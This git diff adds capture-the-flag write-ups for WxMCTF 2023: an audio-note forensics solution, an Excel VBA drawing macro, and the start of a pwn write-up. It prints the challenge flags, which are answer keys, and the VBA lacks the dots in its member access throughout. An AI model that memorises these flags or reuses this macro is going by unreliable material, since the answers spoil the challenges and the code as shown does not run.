feat: added WxMCTF

README.md

@@ -16,7 +16,7 @@ List of CTF events that i have joined before
 | HackTM Quals 2023 | 18 Feb., 19:00 WIB — 19 Feb. 2023, 19:00 WIB | [Link](/HackTM%20Quals%202023/) |
 | CTF ARA 2023 | 25 Feb., 9:00 WIB — 26 Feb. 2023, 17:00 WIB | [Link](/CTF%20ARA%202023/) |
 | VU CYBERTHON 2023 | 25 Feb., 14:00 WIB — 26 Feb. 2023, 02:00 WIB | [Link](/VU%20CYBERTHON%202023/) |
-| WxMCTF 2023 | 01 March, 12:00 WIB — 14 March 2023, 12:00 WIB	 | Soon |
+| WxMCTF 2023 | 01 March, 12:00 WIB — 14 March 2023, 12:00 WIB | [Link](/WxMCTF%202023/) |
 | Cyber Security Challenge Germany 2023 | 02 March, 00:00 WIB — 02 May 2023, 00:00 WIB | Soon |
 | CTF After Dark - Winter 2023 | 02 March, 09:00 WIB — 09 March 2023, 11:00 WIB | [Link](/CTF%20After%20Dark%20-%20Winter%202023/) |
 | KalmarCTF 2023 | 04 March, 00:00 WIB — 06 March 2023, 00:00 WIB | [Link](/KalmarCTF%202023/) |

WxMCTF 2023/README.md

@@ -0,0 +1,13 @@
+# WxMCTF 2023
+CTF writeup for The WxMCTF 2023. I took part in this CTF competition with the TuX team, and got 16th place out of 245 teams
+
+Thanks to the team especially @dRe
+
+| Category | Challenge
+| --- | --- |
+| Forensics | [WxMCTF Forensics 2 - Sneaky Spying](/WxMCTF%202023/WxMCTF%20Forensics%202%20-%20Sneaky%20Spying/) |
+| Forensics | [WxMCTF Forensics 3 - ART](/WxMCTF%202023/WxMCTF%20Forensics%203%20-%20ART/) |
+| Pwn | [WxMCTF Pwn 1 - Cats](/WxMCTF%202023/WxMCTF%20Pwn%201%20-%20Cats/) |
+| Rev | [WxMCTF Rev 3 - Brainf](/WxMCTF%202023/WxMCTF%20Rev%203%20-%20Brainf/) |
+| Web | [WxMCTF Web 2 - Restricted Access](/WxMCTF%202023/WxMCTF%20Web%202%20-%20Restricted%20Access/) |
+| Web | [WxMCTF Web 3 - NFTs](/WxMCTF%202023/WxMCTF%20Web%203%20-%20NFTs/) |

WxMCTF 2023/WxMCTF Forensics 2 - Sneaky Spying/README.md

@@ -0,0 +1,22 @@
+# WxMCTF Forensics 2 - Sneaky Spying
+> Shhh, don't tell the MGCI kids, but I spied on one of their conversations! Uhh, I couldn't really understand what they were saying though. Can you let me you what they said? -For educational purposes of course.
+
+> Oh, they also had this open on their phones. I don't know what to make of it though: https://pages.mtu.edu/~suits/notefreqs.html
+
+> Enter any letter characters inside the flag as upper case (e.g: wxmctf{H3LLO})
+
+## About the Challenge
+We have been given a `wav` file (You can download the file [here](MGCI_Kids_Conversation.wav))and we need to find the music notes
+
+## How to Solve?
+To get the flag you can use `Sonic Visualizer` and add a new pane called `Peak Frequency Spectogram`
+
+![pane](images/pane.png)
+
+Hover your mouse over the yellow light to get an alphabet such as (ABCDEFG) and repeat for each note
+
+![flag](images/flag.png)
+
+```
+wxmctf{DECAFE}
+```

WxMCTF 2023/WxMCTF Forensics 3 - ART/ART_iAugUZ2.txt

@@ -0,0 +1,956 @@
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("B4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("C1:C3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("D4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("E1:E3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("G1:G2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("H3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("I1:I2")Select
+    Range("I2")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("I4:I5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("G4:G5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("B4:D4")Select
+    Range("D4")Activate
+    ActiveCellFormulaR1C1 = ""
+    Range("A4:E4")Select
+    With SelectionInterior
+        Pattern = xlNone
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("A4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("C4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("E4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("D5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("B5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("K1:K5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("L2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("M3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("N2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("O1:O5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("Q2:Q4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("R1:S1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("R5:S5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("U1:W1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("V1:V5")Select
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("Y1:Y5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("Y1:AA1")Select
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("Y3:AA3")Select
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AC3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AD1:AD2")Select
+    Range("AD2")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AE1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AD4:AD5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AE5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    ApplicationLeft = -2144
+    ApplicationTop = 376
+    Range("AG1:AH1")Select
+    ApplicationLeft = -1346
+    ApplicationTop = 394
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AI2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AG3:AH3")Select
+    Range("AH3")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AI4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AG5:AH5")Select
+    Range("AH5")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AK1:AK2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AL3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AM1:AM2")Select
+    Range("AM2")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AM4:AM5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AK4:AK5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AO2:AO4")Select
+    Range("AO4")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AP1:AQ1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AP5:AQ5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AS5:AT5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AU4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AS3:AT3")Select
+    Range("AT3")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AS1:AT1")Select
+    Range("AT1")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AU2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AW1:AW5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("AX5:AY5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BA1:BA5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BB5:BC5")Select
+    Range("BC5")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BE5:BG5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BF1:BF5")Select
+    Range("BF5")Activate
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BE1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BE5")Select
+    With SelectionInterior
+        Pattern = xlNone
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BG5")Select
+    With SelectionInterior
+        Pattern = xlNone
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BH1:BH5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BI2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BJ3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BK4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BL1:BL5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BN2:BN4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BO1:BQ1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BO5:BQ5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BQ3:BQ5")Select
+    Range("BQ5")Activate
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BP3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BS5:BU5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BW1:BX1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BX1:BX5")Select
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BH1:BL5")Select
+    SelectionCopy
+    Range("BZ1")Select
+    ActiveSheetPaste
+    Range("BV5")Select
+    ApplicationCutCopyMode = False
+    SelectionCopy
+    Range("BS5:BU5")Select
+    Range("BU5")Activate
+    ApplicationCutCopyMode = False
+    SelectionCopy
+    Range("CF5")Select
+    ActiveSheetPaste
+    ApplicationCutCopyMode = False
+    ApplicationLeft = -44
+    ApplicationTop = -44
+    ApplicationWidth = 11628
+    ApplicationHeight = 6348
+    Range("BH3:BH5")Select
+    Range("BH5")Activate
+    SelectionCopy
+    Range("CJ3:CJ5")Select
+    Range("CJ5")Activate
+    ActiveSheetPaste
+    Range("CJ2")Select
+    ActiveSheetPaste
+    Range("CL2")Select
+    ActiveSheetPaste
+    Range("CL3")Select
+    ActiveSheetPaste
+    Range("CK1")Select
+    ApplicationCutCopyMode = False
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CK3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CJ1:CL5")Select
+    SelectionClearContents
+    Range("CJ1:CL5")Select
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    With SelectionInterior
+        Pattern = xlNone
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CJ4:CL4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CJ3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CK2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CL1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CL2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CL3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CL5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CM4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CO1:CO5")Select
+    Range("CO5")Activate
+    With SelectionFont
+        Color = -16776961
+        TintAndShade = 0
+    End With
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CP1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CQ2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CP3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CQ4:CQ5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CS1:CU1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CT2:CT5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CW5:CY5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("BE1:BF5")Select
+    SelectionCopy
+    Range("DA1")Select
+    ActiveSheetPaste
+    Range("DD2:DD4")Select
+    ApplicationCutCopyMode = False
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DE5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DF2:DF4")Select
+    Range("DF4")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DE1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DH1:DH5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DH1:DJ1")Select
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DH3:DJ3")Select
+    With SelectionInterior
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DL1:DM1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DN2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DM3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DL4:DL5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DM5:DN5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DP2:DP4")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DQ1:DR1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DQ5:DR5")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DT1:DU1")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DU2")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DV3")Select
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DT4:DU5")Select
+    Range("DU4")Activate
+    With SelectionInterior
+        Pattern = xlSolid
+        PatternColorIndex = xlAutomatic
+        ThemeColor = xlThemeColorLight1
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("DT4")Select
+    With SelectionInterior
+        Pattern = xlNone
+        TintAndShade = 0
+        PatternTintAndShade = 0
+    End With
+    Range("CE11")Select
+End Sub

WxMCTF 2023/WxMCTF Forensics 3 - ART/README.md

@@ -0,0 +1,16 @@
+# WxMCTF Forensics 3 - ART
+> Pshhh, who needs drawing software to make their art? I have coding skills, let me prove it!
+
+> All letters in the flag are uppercase, including the WXMCTF{} part.
+
+## About the Challenge
+We have been given a VBA code and you can run it on the excel (You can download the file [here](ART_iAugUZ2.txt))
+
+## How to Solve?
+To get the flag you need to run the VBA code by using `Alt + F11` (Actually you need to recode a little bit about the VBA code but I forgot to save the recoded code... ) After you recoded the VBA code, the excel will look like this
+
+![flag](images/flag.png)
+
+```
+WXMCTF{3XC3LL1NG_1N_4RT_10F2C}
+```

WxMCTF 2023/WxMCTF Pwn 1 - Cats/README.md

@@ -0,0 +1,56 @@
+# WxMCTF Pwn 1 - Cats
+> I had to hide my secret so any MGCI cat-haters will never find it! Do you like cats?
+
+## About the Challenge
